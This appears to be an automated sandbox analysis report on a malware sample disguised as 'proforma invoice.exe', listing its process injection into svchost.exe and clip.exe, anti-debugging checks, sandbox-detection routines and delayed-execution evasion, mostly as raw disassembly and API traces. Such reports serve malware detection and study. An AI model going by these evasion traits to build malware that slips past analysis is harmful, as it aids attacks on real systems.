            Source: Binary string: wntdll.pdb source: proforma invoice.exe, 00000000.00000003.1653485893.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, proforma invoice.exe, 00000000.00000003.1652243415.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1759986126.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761687857.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.0000000003200000.00000040.00001000.00020000.00000000.sdmp, clip.exe, clip.exe, 00000003.00000003.1851656992.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1849341364.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000001.00000002.1849243613.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1817977068.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000003.1787838240.0000000000894000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000003.00000002.4104507554.000000000555C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920600296.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B35C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000003.00000002.4104507554.000000000555C000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000000.1920600296.0000000002BDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2142736899.000000002B35C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000001.00000002.1849243613.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1817977068.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, NpiZrjTdIDFUidJcY.exe, 00000002.00000003.1787838240.0000000000894000.00000004.00000020.00020000.00000000.sdmp
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: proforma invoice.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC0A76 push ecx; ret 0_2_00AC0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031C0 push eax; ret 1_2_004031C2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004161D3 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004162CC push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417356 push ebx; retf 1_2_00417359
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416338 push ecx; ret 1_2_004162EE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004083DA push es; ret 1_2_004083DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040BBEC pushad ; iretd 1_2_0040BBEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418577 push 2823B84Bh; retf 1_2_00418587
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417D38 push ecx; iretd 1_2_00417D39
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401E6C push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00411E39 push esp; ret 1_2_00411E41
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00401ECE push dword ptr [ebx+3E93C2B8h]; retf 1_2_00401EDE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320225F pushad ; ret 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032027FA pushad ; ret 1_2_032027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx1_2_032309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320283D push eax; iretd 1_2_03202858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320135E push eax; iretd 1_2_03201369
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F327FA pushad ; ret 3_2_04F327F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F3225F pushad ; ret 3_2_04F327F9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F3283D push eax; iretd 3_2_04F32858
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F609AD push ecx; mov dword ptr [esp], ecx3_2_04F609B6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F31368 push eax; iretd 3_2_04F31369
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_030603DB push ecx; retf 3_2_030603DC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03054193 push ebx; retf 3_2_03054196
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03054B75 push ecx; iretd 3_2_03054B76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03048A29 pushad ; iretd 3_2_03048A2B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03056F40 push edx; retf 3_2_03056F9A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0305AD62 push FFFFFFB8h; retf 3_2_0305AD64
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0304EC76 push esp; ret 3_2_0304EC7E
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0305ACE1 push edi; ret 3_2_0305ACE2
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00ABF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00ABF98E
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00B31C41
            Source: C:\Users\user\Desktop\proforma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\Desktop\proforma invoice.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-96808
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\proforma invoice.exeAPI/Special instruction interceptor: Address: 2103274
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\clip.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 2695Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 7277Jump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeAPI coverage: 4.0 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
            Source: C:\Windows\SysWOW64\clip.exe TID: 7872Thread sleep count: 2695 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7872Thread sleep time: -5390000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7872Thread sleep count: 7277 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exe TID: 7872Thread sleep time: -14554000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe TID: 7984Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe TID: 7984Thread sleep time: -39000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe TID: 7984Thread sleep count: 37 > 30Jump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe TID: 7984Thread sleep time: -37000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B0DBBE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B168EE FindFirstFileW,FindClose,0_2_00B168EE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00B1698F
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D076
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B0D3A9
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B19642
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B1979D
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00B19B2B
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00B15C97
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0305BC20 FindFirstFileW,FindNextFileW,FindClose,3_2_0305BC20
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
            Source: firefox.exe, 00000008.00000002.2149522364.0000025BEB3AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII(
            Source: clip.exe, 00000003.00000002.4103317306.0000000003205000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls
            Source: NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4103531459.0000000000BBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004173E3 LdrLoadDll,1_2_004173E3
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1EAA2 BlockInput,0_2_00B1EAA2
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AD2622
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA42DE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC4CE8 mov eax, dword ptr fs:[00000030h]0_2_00AC4CE8
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_021034E0 mov eax, dword ptr fs:[00000030h]0_2_021034E0
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_02103540 mov eax, dword ptr fs:[00000030h]0_2_02103540
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_02101E70 mov eax, dword ptr fs:[00000030h]0_2_02101E70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov ecx, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA352 mov eax, dword ptr fs:[00000030h]1_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8350 mov ecx, dword ptr fs:[00000030h]1_2_032D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E388 mov eax, dword ptr fs:[00000030h]1_2_0322E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325438F mov eax, dword ptr fs:[00000030h]1_2_0325438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228397 mov eax, dword ptr fs:[00000030h]1_2_03228397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032403E9 mov eax, dword ptr fs:[00000030h]1_2_032403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F0 mov eax, dword ptr fs:[00000030h]1_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032663FF mov eax, dword ptr fs:[00000030h]1_2_032663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EC3CD mov eax, dword ptr fs:[00000030h]1_2_032EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323A3C0 mov eax, dword ptr fs:[00000030h]1_2_0323A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032383C0 mov eax, dword ptr fs:[00000030h]1_2_032383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B63C0 mov eax, dword ptr fs:[00000030h]1_2_032B63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov ecx, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DE3DB mov eax, dword ptr fs:[00000030h]1_2_032DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D43D4 mov eax, dword ptr fs:[00000030h]1_2_032D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322823B mov eax, dword ptr fs:[00000030h]1_2_0322823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234260 mov eax, dword ptr fs:[00000030h]1_2_03234260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322826B mov eax, dword ptr fs:[00000030h]1_2_0322826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0274 mov eax, dword ptr fs:[00000030h]1_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov eax, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B8243 mov ecx, dword ptr fs:[00000030h]1_2_032B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322A250 mov eax, dword ptr fs:[00000030h]1_2_0322A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03236259 mov eax, dword ptr fs:[00000030h]1_2_03236259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA250 mov eax, dword ptr fs:[00000030h]1_2_032EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032402A0 mov eax, dword ptr fs:[00000030h]1_2_032402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov ecx, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C62A0 mov eax, dword ptr fs:[00000030h]1_2_032C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E284 mov eax, dword ptr fs:[00000030h]1_2_0326E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B0283 mov eax, dword ptr fs:[00000030h]1_2_032B0283
